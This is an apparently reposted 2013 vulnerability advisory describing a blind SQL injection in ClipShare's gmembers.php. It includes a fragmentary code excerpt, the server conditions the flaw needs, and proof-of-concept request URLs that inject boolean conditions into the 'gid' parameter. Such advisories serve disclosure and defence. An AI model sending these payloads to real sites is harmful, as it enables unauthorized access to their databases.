来源:自学PHP网 时间:2015-04-17 11:59 作者: 阅读:次
[导读] 标题: ClipShare 4.1.1 (gmembers.php) Blind SQL Injection Vulnerability 作者: Esac 影响程序: ClipShare - Video Sharing Community Script 4.1.4 官网: http://www.clip-share.com 任意......
标题: ClipShare 4.1.1 (gmembers.php) Blind SQL Injection Vulnerability
作者: Esac
影响程序: ClipShare - Video Sharing Community Script 4.1.4
官网: http://www.clip-share.com
注意 : this vulnerable work just if there is a group added to the community
#to exploit this vulnerability MAGIC_QUOTES_GPC directive must be turned off on server side.(php.ini)
PHP script : members.php on line 23
============ BEGIN OF gmembers.php =======
execute($sql); if ( $conn->Affected_Rows() == 1 ) { $urlkey = $rs->fields['gurl']; $gname = $rs->fields['gname']; $gupload = $rs->fields['gupload']; $oid = $rs->fields['OID']; STemplate::assign('gname', $gname); STemplate::assign('gurl', $urlkey); STemplate::assign('gupload', $gupload); } else { session_write_close(); header('Location: ' .$config['BASE_URL']. '/error.php?type=group_missing'); die(); } ...........................................; ............................................... ?>
Poc :
http://www.2cto.com /mavideo/gmembers.php?gid=6 [Blind SQLi]
Real exploitation :
http://server/mavideo/gmembers.php?gid=6 AND 1=1
==> return normal page
http://server/mavideo/gmembers.php?gid=6 AND 1=2
==> return page with some errors ( or with nothing - white page )
Tested version:
Sunday , March 24, 2013 | Version: 4.1.4 | Username: admin | Logout
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Greetz : White Tarbouch Team